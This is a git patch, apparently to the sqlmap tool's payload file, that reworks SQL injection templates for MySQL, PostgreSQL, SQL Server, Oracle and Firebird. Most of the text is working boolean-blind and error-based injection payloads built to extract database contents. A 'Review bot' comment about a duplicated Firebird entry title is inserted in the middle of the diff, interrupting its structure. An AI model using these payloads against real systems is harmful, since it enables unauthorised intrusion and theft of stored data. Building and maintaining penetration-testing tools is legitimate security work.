From 261261597822451894e213d20833b667c022b0a2 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 4 Dec 2010 16:40:08 +0000 Subject: [PATCH] Major improvements --- xml/payloads.xml | 411 +++++++++++++++++++++++++---------------------- 1 file changed, 217 insertions(+), 194 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 1f371bd1d..673936d8c 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -413,7 +413,7 @@ Formats: OR boolean-based blind - WHERE clause 1 - 4 + 3 3 1 2 @@ -428,7 +428,7 @@ Formats: OR boolean-based blind - WHERE clause 1 - 4 + 3 3 1 1 @@ -447,7 +447,7 @@ Formats: OR boolean-based blind - WHERE clause 1 - 4 + 3 3 1 1 @@ -462,11 +462,109 @@ Formats: + + + + + Generic boolean-based blind - Parameter replace + 1 + 2 + 1 + 2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) + + + + + MySQL >= 5.0 boolean-based blind - Parameter replace + 1 + 3 + 1 + 2,3 + 3 + (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - Parameter replace + 1 + 4 + 1 + 2,3 + 3 + (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace + 1 + 3 + 1 + 3 + 3 + (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + +
+ Microsoft SQL Server +
+
+ + + Oracle boolean-based blind - Parameter replace + 1 + 3 + 1 + 3 + 3 + (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + +
+ Oracle +
+
+ + + - Generic boolean-based blind - GROUP BY and ORDER BY clauses (append) + Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 @@ -482,7 +580,7 @@ Formats: - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append) + MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 @@ -502,7 +600,7 @@ Formats: - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append) + MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 @@ -521,7 +619,7 @@ Formats: - Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (append) + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 @@ -540,7 +638,7 @@ Formats: - Oracle boolean-based blind - ORDER BY clause (append) + Oracle boolean-based blind - ORDER BY clause 1 3 1 @@ -558,102 +656,6 @@ Formats: - - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace) - 1 - 4 - 1 - 2,3 - 3 - (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - -
- MySQL - >= 5.0 -
-
- - - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace) - 1 - 5 - 1 - 2,3 - 3 - (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
- MySQL -
-
- - - Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (replace) - 1 - 4 - 1 - 3 - 3 - (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - -
- Microsoft SQL Server -
-
- - - Oracle boolean-based blind - ORDER BY clause (replace) - 1 - 4 - 1 - 3 - 3 - (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - -
- Oracle -
-
- - - - - Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace) - 1 - 4 - 1 - 2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) - - - - @@ -736,11 +738,11 @@ Formats: Firebird error-based - WHERE clause (AND) 2 - 1 + 2 0 1 1 - AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + AND [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -832,11 +834,11 @@ Formats: Firebird error-based - WHERE clause (OR) 2 - 2 + 3 2 1 1 - OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + OR [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -854,9 +856,108 @@ Formats: + + + MySQL >= 5.0 error-based - Parameter replace + 2 + 3 + 0 + 2,3 + 3 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + PostgreSQL error-based - Parameter replace + 2 + 3 + 0 + 2,3 + 3 + (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace + 2 + 3 + 0 + 3 + 3 + (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + + (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server +
+
+ + + Oracle error-based - Parameter replace + 2 + 3 + 0 + 3 + 3 + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - WHERE clause (OR) + 2 + 4 + 0 + 3 + 3 + (SELECT [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')) + + (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (append) + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses 2 3 0 @@ -876,7 +977,7 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses (append) + PostgreSQL error-based - GROUP BY and ORDER BY clauses 2 3 0 @@ -895,7 +996,7 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause (append) + Microsoft SQL Server/Sybase error-based - ORDER BY clause 2 3 0 @@ -914,7 +1015,7 @@ Formats: - Oracle error-based - ORDER BY clause (append) + Oracle error-based - ORDER BY clause 2 3 0 @@ -931,83 +1032,6 @@ Formats: Oracle - - - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (replace) - 2 - 4 - 0 - 2,3 - 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
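Review bot: The last entry added in the error-based "Parameter replace" group still carries the title `Firebird error-based - WHERE clause (OR)`, which is the same title as the existing Firebird WHERE-clause entry touched in the earlier `@@ -832` hunk, while its four siblings in this hunk are all named `… error-based - Parameter replace`. The payload itself is a bare SELECT with no OR prefix, so the title looks copy-pasted rather than intended; rename it to `Firebird error-based - Parameter replace` so the group is consistent and so that any log line or lookup keyed on the title cannot confuse the two entries. The same inconsistency does not occur in the boolean-based counterpart hunk at `@@ -462`, where every new entry already uses the "- Parameter replace" suffix, so only this one line needs changing.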
- MySQL - >= 5.0 -
-
- - - PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace) - 2 - 4 - 0 - 2,3 - 3 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) - - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- PostgreSQL -
-
- - - Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace) - 2 - 4 - 0 - 3 - 3 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) - - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Microsoft SQL Server -
-
- - - Oracle error-based - ORDER BY clause (replace) - 2 - 4 - 0 - 3 - 3 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Oracle -
-
Firebird stacked queries 4 3